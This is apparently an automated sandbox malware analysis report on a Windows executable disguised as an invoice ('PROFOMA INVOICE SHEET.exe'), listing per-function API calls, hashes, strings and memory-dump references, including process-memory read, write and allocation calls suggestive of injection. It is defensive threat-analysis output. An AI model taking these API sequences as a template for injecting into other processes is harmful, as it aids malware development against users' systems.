                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: HeapInformationToken$AllocErrorLastProcess
                                    • String ID:
                                    • API String ID: 44706859-0
                                    • Opcode ID: 89914e51f69280f5b40f3c904b48667d1027687f062f43cfbe303f7bde259389
                                    • Instruction ID: 14e92a46cc6ce43afdb1a843554aba09171ac75177dfa533b068ed1ab517ef80
                                    • Opcode Fuzzy Hash: 89914e51f69280f5b40f3c904b48667d1027687f062f43cfbe303f7bde259389
                                    • Instruction Fuzzy Hash: E8F06D39210311EBDB235FA8EC49F5A3BADEF89761F254416FA45C7260CA72D8508AB0
                                    APIs
                                    • CloseHandle.KERNEL32(?,?,?,?,0037017D,?,003732FC,?,00000001,00342592,?), ref: 00370324
                                    • CloseHandle.KERNEL32(?,?,?,?,0037017D,?,003732FC,?,00000001,00342592,?), ref: 00370331
                                    • CloseHandle.KERNEL32(?,?,?,?,0037017D,?,003732FC,?,00000001,00342592,?), ref: 0037033E
                                    • CloseHandle.KERNEL32(?,?,?,?,0037017D,?,003732FC,?,00000001,00342592,?), ref: 0037034B
                                    • CloseHandle.KERNEL32(?,?,?,?,0037017D,?,003732FC,?,00000001,00342592,?), ref: 00370358
                                    • CloseHandle.KERNEL32(?,?,?,?,0037017D,?,003732FC,?,00000001,00342592,?), ref: 00370365
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: CloseHandle
                                    • String ID:
                                    • API String ID: 2962429428-0
                                    • Opcode ID: 741f25770bf5b87a8c5ece4cf5988395991f461210b210b9d094669c9c212ebe
                                    • Instruction ID: 2e8bf694b7aca310189c3deda147239645a7e493703ea4a12a5c770d64d8203a
                                    • Opcode Fuzzy Hash: 741f25770bf5b87a8c5ece4cf5988395991f461210b210b9d094669c9c212ebe
                                    • Instruction Fuzzy Hash: 5D019076800B15DFD736AF66D880416F7F9BE503153168A3FD19A52931C375A954CE80
                                    APIs
                                    • _free.LIBCMT ref: 0033D752
                                      • Part of subcall function 003329C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0033D7D1,00000000,00000000,00000000,00000000,?,0033D7F8,00000000,00000007,00000000,?,0033DBF5,00000000), ref: 003329DE
                                      • Part of subcall function 003329C8: GetLastError.KERNEL32(00000000,?,0033D7D1,00000000,00000000,00000000,00000000,?,0033D7F8,00000000,00000007,00000000,?,0033DBF5,00000000,00000000), ref: 003329F0
                                    • _free.LIBCMT ref: 0033D764
                                    • _free.LIBCMT ref: 0033D776
                                    • _free.LIBCMT ref: 0033D788
                                    • _free.LIBCMT ref: 0033D79A
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: _free$ErrorFreeHeapLast
                                    • String ID:
                                    • API String ID: 776569668-0
                                    • Opcode ID: f38f9da13d5d4adbc92e83ccd99762beee9ef8b2fb4b7e991b9ef54be560f2b8
                                    • Instruction ID: 42bc3dbf3fc296fb2db6d1ec0c2370a09e7e556251bcbe8f8f80cf285c925ccb
                                    • Opcode Fuzzy Hash: f38f9da13d5d4adbc92e83ccd99762beee9ef8b2fb4b7e991b9ef54be560f2b8
                                    • Instruction Fuzzy Hash: CAF0F972554218AB8623EF68F9C6D1B7BDDBB45710FA61845F048EB502CB30FC908B64
                                    APIs
                                    • GetDlgItem.USER32(?,000003E9), ref: 00365C58
                                    • GetWindowTextW.USER32(00000000,?,00000100), ref: 00365C6F
                                    • MessageBeep.USER32(00000000), ref: 00365C87
                                    • KillTimer.USER32(?,0000040A), ref: 00365CA3
                                    • EndDialog.USER32(?,00000001), ref: 00365CBD
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: BeepDialogItemKillMessageTextTimerWindow
                                    • String ID:
                                    • API String ID: 3741023627-0
                                    • Opcode ID: 53aee9099152ec2b0535d1c9a1a31209989236bfe4654cd06141e11e6b3540eb
                                    • Instruction ID: 3a567640a5681075b5648bd0ddf493a0267313c9a5e9da601f74cb5514dbd0b3
                                    • Opcode Fuzzy Hash: 53aee9099152ec2b0535d1c9a1a31209989236bfe4654cd06141e11e6b3540eb
                                    • Instruction Fuzzy Hash: EE01A430510B04AFEB225B10DD4EFA67BBCBF00B05F04556AB583A14E5DBF5A984CB90
                                    APIs
                                    • _free.LIBCMT ref: 003322BE
                                      • Part of subcall function 003329C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0033D7D1,00000000,00000000,00000000,00000000,?,0033D7F8,00000000,00000007,00000000,?,0033DBF5,00000000), ref: 003329DE
                                      • Part of subcall function 003329C8: GetLastError.KERNEL32(00000000,?,0033D7D1,00000000,00000000,00000000,00000000,?,0033D7F8,00000000,00000007,00000000,?,0033DBF5,00000000,00000000), ref: 003329F0
                                    • _free.LIBCMT ref: 003322D0
                                    • _free.LIBCMT ref: 003322E3
                                    • _free.LIBCMT ref: 003322F4
                                    • _free.LIBCMT ref: 00332305
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: _free$ErrorFreeHeapLast
                                    • String ID:
                                    • API String ID: 776569668-0
                                    • Opcode ID: 8cbb4092f5841acfc30dcc5afaafb7c148dc8391c2f5650af44ad2e6eae14ac9
                                    • Instruction ID: 26a8ca587d1e474627e6e0a2d0f6f84bed58861cd11d381b33bb53f28d5f546e
                                    • Opcode Fuzzy Hash: 8cbb4092f5841acfc30dcc5afaafb7c148dc8391c2f5650af44ad2e6eae14ac9
                                    • Instruction Fuzzy Hash: 47F05E748122309B8627AF54BC81E0F3B6CF719B60F15194BF414DA2B1C7321822AFE5
                                    APIs
                                    • EndPath.GDI32(?), ref: 003195D4
                                    • StrokeAndFillPath.GDI32(?,?,003571F7,00000000,?,?,?), ref: 003195F0
                                    • SelectObject.GDI32(?,00000000), ref: 00319603
                                    • DeleteObject.GDI32 ref: 00319616
                                    • StrokePath.GDI32(?), ref: 00319631
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: Path$ObjectStroke$DeleteFillSelect
                                    • String ID:
                                    • API String ID: 2625713937-0
                                    • Opcode ID: 21f55eb704436a0bb04639e73b815bb2ef3547809a10b9d22526aacd1b7ffb8b
                                    • Instruction ID: ce770d821cf1b38a8160cbfb53bdab41a074893a2edec8c8fa547e0a6154d4c7
                                    • Opcode Fuzzy Hash: 21f55eb704436a0bb04639e73b815bb2ef3547809a10b9d22526aacd1b7ffb8b
                                    • Instruction Fuzzy Hash: 14F0EC31026204EBDB175F65FD3C7A43B69AB09332F048216F465591F1C7358995DFB4
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: __freea$_free
                                    • String ID: a/p$am/pm
                                    • API String ID: 3432400110-3206640213
                                    • Opcode ID: 40a049ab78036e28120db5667f7659514e4758290e1c084df6d373e6db2967a7
                                    • Instruction ID: e09a8b625a68fab37ccc395b9b7b90c7112ba2dfaa1f2c61fd5055b0e10bbba6
                                    • Opcode Fuzzy Hash: 40a049ab78036e28120db5667f7659514e4758290e1c084df6d373e6db2967a7
                                    • Instruction Fuzzy Hash: 98D11439D00206CADB2B9F68C8D5BFEB7B4FF05320F294219E9419BA55D3759D80CB91
                                    APIs
                                      • Part of subcall function 00320242: EnterCriticalSection.KERNEL32(003D070C,003D1884,?,?,0031198B,003D2518,?,?,?,003012F9,00000000), ref: 0032024D
                                      • Part of subcall function 00320242: LeaveCriticalSection.KERNEL32(003D070C,?,0031198B,003D2518,?,?,?,003012F9,00000000), ref: 0032028A
                                      • Part of subcall function 003200A3: __onexit.LIBCMT ref: 003200A9
                                    • __Init_thread_footer.LIBCMT ref: 00386238
                                      • Part of subcall function 003201F8: EnterCriticalSection.KERNEL32(003D070C,?,?,00318747,003D2514), ref: 00320202
                                      • Part of subcall function 003201F8: LeaveCriticalSection.KERNEL32(003D070C,?,00318747,003D2514), ref: 00320235
                                      • Part of subcall function 0037359C: LoadStringW.USER32(00000066,?,00000FFF,00000000), ref: 003735E4
                                      • Part of subcall function 0037359C: LoadStringW.USER32(003D2390,?,00000FFF,?), ref: 0037360A
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: CriticalSection$EnterLeaveLoadString$Init_thread_footer__onexit
                                    • String ID: x#=$x#=$x#=
                                    • API String ID: 1072379062-3174260402
                                    • Opcode ID: 535d4a1ff9177914310e335929c084821ad79ae431fc3ac66b3067a5ab9bddee
                                    • Instruction ID: 5b934d9e820b188f4eda5cb29e9e1345ed15c237369723db34d1c070bb98d13f
                                    • Opcode Fuzzy Hash: 535d4a1ff9177914310e335929c084821ad79ae431fc3ac66b3067a5ab9bddee
                                    • Instruction Fuzzy Hash: 75C1B171A00205AFCB16EF58D892EBEB7B9FF49300F1180A9F9059B291DB70ED45CB90
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: JO0
                                    • API String ID: 0-3547640418
                                    • Opcode ID: d82fd4e8d7a2ef540b36ba04155c1609c5cd8901e3b02041803ce49870892776
                                    • Instruction ID: 916190adccf1b0ace781ef8e7dbaa34681abc955063b793b060b57361994ebb5
                                    • Opcode Fuzzy Hash: d82fd4e8d7a2ef540b36ba04155c1609c5cd8901e3b02041803ce49870892776
                                    • Instruction Fuzzy Hash: ED51AE75D00619AFCB239FA4D8C5FEEBBB8AF06314F15045AF405AB292D7319A01CB61
                                    APIs
                                    • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,00000002,00000000,?,?,?,00000000,?,?,?,?), ref: 00338B6E
                                    • GetLastError.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,00000000,00001000,?), ref: 00338B7A
                                    • __dosmaperr.LIBCMT ref: 00338B81
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: ByteCharErrorLastMultiWide__dosmaperr
                                    • String ID: .2
                                    • API String ID: 2434981716-1634799438
                                    • Opcode ID: cde79c5e55894e2667534a50bc9507cecd9e003d5296bccb1462aec764951605
                                    • Instruction ID: 8e7b78b6a30508be4ca56941ed4fe8f46e8a5e4e2264d70ce09a3c5b8b02dfe4
                                    • Opcode Fuzzy Hash: cde79c5e55894e2667534a50bc9507cecd9e003d5296bccb1462aec764951605
                                    • Instruction Fuzzy Hash: A841B0B0608246AFCB279F28DCC0A7DBFE9DF46304F2845AAF4948B552DE31CC028790
                                    APIs
                                      • Part of subcall function 0036B403: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,003621D0,?,?,00000034,00000800,?,00000034), ref: 0036B42D
                                    • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00362760
                                      • Part of subcall function 0036B3CE: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,003621FF,?,?,00000800,?,00001073,00000000,?,?), ref: 0036B3F8
                                      • Part of subcall function 0036B32A: GetWindowThreadProcessId.USER32(?,?), ref: 0036B355
                                      • Part of subcall function 0036B32A: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00362194,00000034,?,?,00001004,00000000,00000000), ref: 0036B365
                                      • Part of subcall function 0036B32A: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00362194,00000034,?,?,00001004,00000000,00000000), ref: 0036B37B
                                    • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 003627CD
                                    • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0036281A
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                    • String ID: @
                                    • API String ID: 4150878124-2766056989
                                    • Opcode ID: 95fc352b2791c9c2f9a2a4e3eada1ea5a759215e775d34927b1a260ea0e9b542
                                    • Instruction ID: 02f59ee8669b168ca829681e00eb641fa0c896e6dfa493aae2ca44fc0e0fdb68
                                    • Opcode Fuzzy Hash: 95fc352b2791c9c2f9a2a4e3eada1ea5a759215e775d34927b1a260ea0e9b542
                                    • Instruction Fuzzy Hash: 29413D76A00218AFDB11DFA4CD41EEEBBB8AF05300F118055FA55BB185DB716E85CBA0
                                    APIs
                                    • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\PROFOMA INVOICE SHEET.exe,00000104), ref: 00331769
                                    • _free.LIBCMT ref: 00331834
                                    • _free.LIBCMT ref: 0033183E
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: _free$FileModuleName
                                    • String ID: C:\Users\user\Desktop\PROFOMA INVOICE SHEET.exe
                                    • API String ID: 2506810119-4243878502
                                    • Opcode ID: f01920e7648d9f10e287c09f781411a32fab729c1d65f3e157079ae80efbb250
                                    • Instruction ID: 5480d01c69211d7b96293aca87a71a0a44f7e9cd1cee025674b556d2f45f381d
                                    • Opcode Fuzzy Hash: f01920e7648d9f10e287c09f781411a32fab729c1d65f3e157079ae80efbb250
                                    • Instruction Fuzzy Hash: 32314C75A00218BFDB23DB99ACC5D9EBBBCEB85310F1541A6E8049B211D6718A40CBA4
                                    APIs
                                    • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 0036C306
                                    • DeleteMenu.USER32(?,00000007,00000000), ref: 0036C34C
                                    • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,003D1990,01255F90), ref: 0036C395
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: Menu$Delete$InfoItem
                                    • String ID: 0
                                    • API String ID: 135850232-4108050209
                                    • Opcode ID: fc8961b8211180cf2418b5e0e54ab7e38df6d4f3b38069ce69298e62b346b5f7
                                    • Instruction ID: 6fcc0a97d7374aa250171526d5716d10a7e97715aa8d88c0ce829109005d9f51
                                    • Opcode Fuzzy Hash: fc8961b8211180cf2418b5e0e54ab7e38df6d4f3b38069ce69298e62b346b5f7
                                    • Instruction Fuzzy Hash: 4B41D2352143019FD722DF25D844B2ABBE8AF85310F21DA1EF9A59B3D5C734E804CB62
                                    APIs
                                    • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,0039CC08,00000000,?,?,?,?), ref: 003944AA
                                    • GetWindowLongW.USER32 ref: 003944C7
                                    • SetWindowLongW.USER32(?,000000F0,00000000), ref: 003944D7
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: Window$Long
                                    • String ID: SysTreeView32
                                    • API String ID: 847901565-1698111956
                                    • Opcode ID: 1c1037035ae0dfd92d77700c57ac97a8a6b0339260972cb1c3a91677126b2acf
                                    • Instruction ID: e6b2584fdc29152697bbf124d0f68c8dbbb34065cc2ebccc9ad7fa7783adf459
                                    • Opcode Fuzzy Hash: 1c1037035ae0dfd92d77700c57ac97a8a6b0339260972cb1c3a91677126b2acf
                                    • Instruction Fuzzy Hash: 8931CD32210205AFDF228E78DC45FEA7BA9EB09334F224315F979921D0D770EC519B50
                                    APIs
                                    • SysReAllocString.OLEAUT32(?,?), ref: 00366EED
                                    • VariantCopyInd.OLEAUT32(?,?), ref: 00366F08
                                    • VariantClear.OLEAUT32(?), ref: 00366F12
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: Variant$AllocClearCopyString
                                    • String ID: *j6
                                    • API String ID: 2173805711-2587036816
                                    • Opcode ID: b64e63dbd9dc9811d0df97d7116f084ce9dcbae8f376bce75d0c5bf57e746566
                                    • Instruction ID: 21741d73ffa72be9554e106d5f3f44ac4496078d5a600d299dc31a27b41ae766
                                    • Opcode Fuzzy Hash: b64e63dbd9dc9811d0df97d7116f084ce9dcbae8f376bce75d0c5bf57e746566
                                    • Instruction Fuzzy Hash: 58319171605245DFCB07AFA4E8A29BE777AEF85344B10449DF9024F2A1CB359D22DB90
                                    APIs
                                      • Part of subcall function 0038335B: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,?,?,00383077,?,?), ref: 00383378
                                    • inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 0038307A
                                    • _wcslen.LIBCMT ref: 0038309B
                                    • htons.WSOCK32(00000000,?,?,00000000), ref: 00383106
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: ByteCharMultiWide_wcslenhtonsinet_addr
                                    • String ID: 255.255.255.255
                                    • API String ID: 946324512-2422070025
                                    • Opcode ID: e3b7f9d5945b119249ebe4870e5351de2bf227992d6de314be4fd57c9aa4e64c
                                    • Instruction ID: da06d398cdf94b17a1496a0e7efccb9a5f285054c26f6d7ad7090aebdd82c56a
                                    • Opcode Fuzzy Hash: e3b7f9d5945b119249ebe4870e5351de2bf227992d6de314be4fd57c9aa4e64c
                                    • Instruction Fuzzy Hash: 2131F379604301DFCB12EF28C485EAA77E0EF14B18F258099E8168F792CB72EE41C760
                                    APIs
                                    • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00394705
                                    • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00394713
                                    • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 0039471A
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
